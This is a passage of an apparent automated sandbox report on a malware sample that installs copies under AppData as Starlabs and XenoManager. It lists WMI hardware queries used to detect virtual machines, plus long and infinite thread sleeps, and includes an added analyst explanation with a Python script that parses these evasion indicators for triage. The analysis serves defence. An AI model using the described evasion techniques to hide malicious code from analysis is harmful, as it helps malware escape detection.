Source: C:\Users\user\AppData\Roaming\manager.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\manager.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\manager.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\manager.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\manager.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\manager.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE DriveType = 3
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
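The three WMI queries above (imaging/camera devices via Win32_PnPEntity, fixed disks via Win32_LogicalDisk, display adapters via Win32_VideoController) are classic hypervisor fingerprinting: a bare sandbox typically has no camera, a single small fixed disk and a virtual display adapter. The "Thread sleep time" entries further down in this section are the stalling half of the evasion. A value of 922337203685477 ms is TimeSpan.MaxValue expressed in milliseconds (long.MaxValue ticks divided by 10,000), i.e. a thread waiting forever rather than a timed delay, while the series on TID 3852 that starts at 600000 ms and decreases by roughly 110 to 125 ms per entry is a ten-minute countdown loop that re-sleeps for the remaining time, which is what actually pushes execution past the 30000 ms threshold shown in the report's own ">= -30000s" comparison. The Python script below is an added triage helper, not part of the Joe Sandbox report or of the malware: it parses report lines in the format used here (the sample lines are constructed copies of entries from this section) and summarises, per process, which VM-fingerprint classes were queried, the longest finite sleep, any countdown loops and the number of infinite waits. The VM_FINGERPRINT_CLASSES list is an analyst-chosen assumption, not something the report states.

```python
"""Triage helper: summarise sandbox-evasion entries from a Joe Sandbox style report.

Added example, not part of the original report. SAMPLE_LINES are constructed
copies of entry formats seen in this section.
"""
import re
from collections import defaultdict

# TimeSpan.MaxValue in milliseconds: long.MaxValue ticks (100 ns each) // 10_000.
# A "sleep" of exactly this length is a thread waiting forever, not a timed stall.
INFINITE_WAIT_MS = (2**63 - 1) // 10_000  # 922337203685477

# Analyst-chosen list (assumption, not taken from the report): WMI classes whose
# results are commonly compared against hypervisor / sandbox fingerprints.
VM_FINGERPRINT_CLASSES = {
    "Win32_PnPEntity", "Win32_VideoController", "Win32_LogicalDisk",
    "Win32_ComputerSystem", "Win32_BIOS", "Win32_Processor",
}

WMI_RE = re.compile(r"^Source: (?P<proc>.+?) WMI Queries: .*?(?P<query>SELECT .+)$")
SLEEP_RE = re.compile(
    r"^Source: (?P<proc>.+?) TID: (?P<tid>\d+) Thread sleep time: -(?P<ms>\d+)s >= -(?P<thr>\d+)s")
DELAY_RE = re.compile(r"^Source: (?P<proc>.+?) Window / User API: threadDelayed (?P<n>\d+)")
FROM_RE = re.compile(r"\bFROM\s+(\w+)", re.IGNORECASE)

# Constructed sample: copies of entry formats seen in this section of the report.
SAMPLE_LINES = r"""
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE DriveType = 3
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 Thread sleep time: -599875s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 Thread sleep time: -599762s >= -30000s
Source: C:\Users\user\Desktop\0LpFv1haTA.exe TID: 5236 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Window / User API: threadDelayed 6624
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Window / User API: threadDelayed 3231
""".strip().splitlines()


def parse(lines):
    """Group evasion indicators from report lines by source process."""
    report = defaultdict(lambda: {
        "wmi_classes": set(),          # WMI classes named in a FROM clause
        "sleeps": defaultdict(list),   # finite sleep lengths (ms) per TID, in report order
        "infinite_waits": 0,           # sleeps of TimeSpan.MaxValue
        "thread_delayed": [],          # threadDelayed call counts
    })
    for line in lines:
        line = line.strip()
        if m := WMI_RE.match(line):
            cls = FROM_RE.search(m["query"])
            if cls:
                report[m["proc"]]["wmi_classes"].add(cls.group(1))
        elif m := SLEEP_RE.match(line):
            ms = int(m["ms"])
            entry = report[m["proc"]]
            if ms >= INFINITE_WAIT_MS:
                entry["infinite_waits"] += 1
            else:
                entry["sleeps"][m["tid"]].append(ms)
        elif m := DELAY_RE.match(line):
            report[m["proc"]]["thread_delayed"].append(int(m["n"]))
    return report


def assess(report, stall_threshold_ms=30_000):
    """Per process: which VM-fingerprint classes it queried and how it stalls."""
    findings = {}
    for proc, e in report.items():
        finite = [ms for per_tid in e["sleeps"].values() for ms in per_tid]
        longest = max(finite, default=0)
        # A strictly decreasing run on one TID is a countdown loop: the thread
        # re-sleeps for the remaining time, so the total stall is about the first value.
        countdowns = {tid: (ms[0], len(ms)) for tid, ms in e["sleeps"].items()
                      if len(ms) > 1 and all(a > b for a, b in zip(ms, ms[1:]))}
        findings[proc] = {
            "vm_fingerprint_classes": sorted(e["wmi_classes"] & VM_FINGERPRINT_CLASSES),
            "longest_sleep_ms": longest,
            "stalls_past_threshold": longest >= stall_threshold_ms,
            "countdown_loops": countdowns,
            "infinite_waits": e["infinite_waits"],
            "thread_delayed_calls": sum(e["thread_delayed"]),
        }
    return findings


if __name__ == "__main__":
    for proc, f in assess(parse(SAMPLE_LINES)).items():
        print(proc)
        for key, value in f.items():
            print(f"  {key}: {value}")
```

Run it against a full report export by feeding the lines of this section to parse() instead of SAMPLE_LINES; the countdown detection keys on the order of entries for one TID, so keep the report's line order.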
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Memory allocated: 19457EB0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Memory allocated: 194719C0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Memory allocated: 21F0F7E0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Memory allocated: 21F291E0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Memory allocated: 1E449B50000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Memory allocated: 1E461D40000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Memory allocated: 19233150000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Memory allocated: 1924CB50000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\manager.exe Memory allocated: 2370000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\manager.exe Memory allocated: 2500000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\manager.exe Memory allocated: 4500000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Memory allocated: 30D0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Memory allocated: 3240000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Memory allocated: 5240000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Memory allocated: ED0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Memory allocated: 2CA0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Memory allocated: 11E0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Memory allocated: 1B2AFA60000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Memory allocated: 1B2C9440000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Memory allocated: 289898E0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Memory allocated: 289A3340000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Memory allocated: 1ADB34F0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Memory allocated: 1ADCD070000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 599875
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 599762
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 599649
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 599547
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 599422
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 599313
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 599188
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 599078
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 598969
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 598844
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 598725
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 598625
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 598516
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 598406
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 598297
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 598187
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 598078
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 597969
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 597844
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 597731
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 597625
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 597516
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 597406
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 597296
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 597187
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 597076
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 596969
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 596857
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 596738
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 596624
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 596500
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 596391
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 596281
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 596172
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 596062
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 595953
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 595844
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 595719
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 595609
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 595500
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 599875
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 599765
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 599656
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 599546
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 599437
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 599328
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 599218
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 599109
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 598997
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 598875
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 598765
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 598651
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 598531
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 598421
